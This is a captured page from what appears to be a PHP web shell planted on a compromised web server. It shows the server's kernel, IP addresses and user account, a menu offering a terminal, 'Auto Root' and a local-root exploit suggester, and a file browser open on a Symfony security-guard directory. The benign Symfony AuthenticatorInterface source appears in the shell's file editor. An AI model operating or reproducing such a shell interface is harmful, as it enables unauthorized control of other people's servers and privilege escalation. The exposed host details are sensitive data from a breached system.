Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.132.48
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
security-guard /
Delete
Unzip
Name
Size
Permission
Date
Action
Authenticator
[ DIR ]
drwxrwxr-x
2022-05-06 14:25
Firewall
[ DIR ]
drwxrwxr-x
2022-05-06 14:25
Provider
[ DIR ]
drwxrwxr-x
2022-05-06 14:25
Token
[ DIR ]
drwxrwxr-x
2022-05-06 14:25
AbstractGuardAuthenticator.php
1.13
KB
-rw-rw-r--
2022-05-06 14:25
AuthenticatorInterface.php
5.35
KB
-rw-rw-r--
2022-05-06 14:25
CHANGELOG.md
176
B
-rw-rw-r--
2022-05-06 14:25
GuardAuthenticatorHandler.php
5.43
KB
-rw-rw-r--
2022-05-06 14:25
LICENSE
1.04
KB
-rw-rw-r--
2022-05-06 14:25
PasswordAuthenticatedInterface.php
871
B
-rw-rw-r--
2022-05-06 14:25
README.md
1.01
KB
-rw-rw-r--
2022-05-06 14:25
composer.json
871
B
-rw-rw-r--
2022-05-06 14:25
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Security\Guard; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\Security\Core\Authentication\Token\TokenInterface; use Symfony\Component\Security\Core\Exception\AuthenticationException; use Symfony\Component\Security\Core\User\UserInterface; use Symfony\Component\Security\Core\User\UserProviderInterface; use Symfony\Component\Security\Guard\Token\GuardTokenInterface; use Symfony\Component\Security\Http\EntryPoint\AuthenticationEntryPointInterface; /** * The interface for all "guard" authenticators. * * The methods on this interface are called throughout the guard authentication * process to give you the power to control most parts of the process from * one location. * * @author Ryan Weaver <ryan@knpuniversity.com> * @author Amaury Leroux de Lens <amaury@lerouxdelens.com> * * @deprecated since Symfony 5.3, use the new authenticator system instead */ interface AuthenticatorInterface extends AuthenticationEntryPointInterface { /** * Does the authenticator support the given Request? * * If this returns false, the authenticator will be skipped. * * @return bool */ public function supports(Request $request); /** * Get the authentication credentials from the request and return them * as any type (e.g. an associate array). * * Whatever value you return here will be passed to getUser() and checkCredentials() * * For example, for a form login, you might: * * return [ * 'username' => $request->request->get('_username'), * 'password' => $request->request->get('_password'), * ]; * * Or for an API token that's on a header, you might use: * * return ['api_key' => $request->headers->get('X-API-TOKEN')]; * * @return mixed Any non-null value * * @throws \UnexpectedValueException If null is returned */ public function getCredentials(Request $request); /** * Return a UserInterface object based on the credentials. * * The *credentials* are the return value from getCredentials() * * You may throw an AuthenticationException if you wish. If you return * null, then a UserNotFoundException is thrown for you. * * @param mixed $credentials * * @throws AuthenticationException * * @return UserInterface|null */ public function getUser($credentials, UserProviderInterface $userProvider); /** * Returns true if the credentials are valid. * * If false is returned, authentication will fail. You may also throw * an AuthenticationException if you wish to cause authentication to fail. * * The *credentials* are the return value from getCredentials() * * @param mixed $credentials * * @return bool * * @throws AuthenticationException */ public function checkCredentials($credentials, UserInterface $user); /** * Create an authenticated token for the given user. * * If you don't care about which token class is used or don't really * understand what a "token" is, you can skip this method by extending * the AbstractGuardAuthenticator class from your authenticator. * * @see AbstractGuardAuthenticator * * @return GuardTokenInterface */ public function createAuthenticatedToken(UserInterface $user, string $providerKey); /** * Called when authentication executed, but failed (e.g. wrong username password). * * This should return the Response sent back to the user, like a * RedirectResponse to the login page or a 401 response. * * If you return null, the request will continue, but the user will * not be authenticated. This is probably not what you want to do. * * @return Response|null */ public function onAuthenticationFailure(Request $request, AuthenticationException $exception); /** * Called when authentication executed and was successful! * * This should return the Response sent back to the user, like a * RedirectResponse to the last page they visited. * * If you return null, the current request will continue, and the user * will be authenticated. This makes sense, for example, with an API. * * @return Response|null */ public function onAuthenticationSuccess(Request $request, TokenInterface $token, string $providerKey); /** * Does this method support remember me cookies? * * Remember me cookie will be set if *all* of the following are met: * A) This method returns true * B) The remember_me key under your firewall is configured * C) The "remember me" functionality is activated. This is usually * done by having a _remember_me checkbox in your form, but * can be configured by the "always_remember_me" and "remember_me_parameter" * parameters under the "remember_me" firewall key * D) The onAuthenticationSuccess method returns a Response object * * @return bool */ public function supportsRememberMe(); }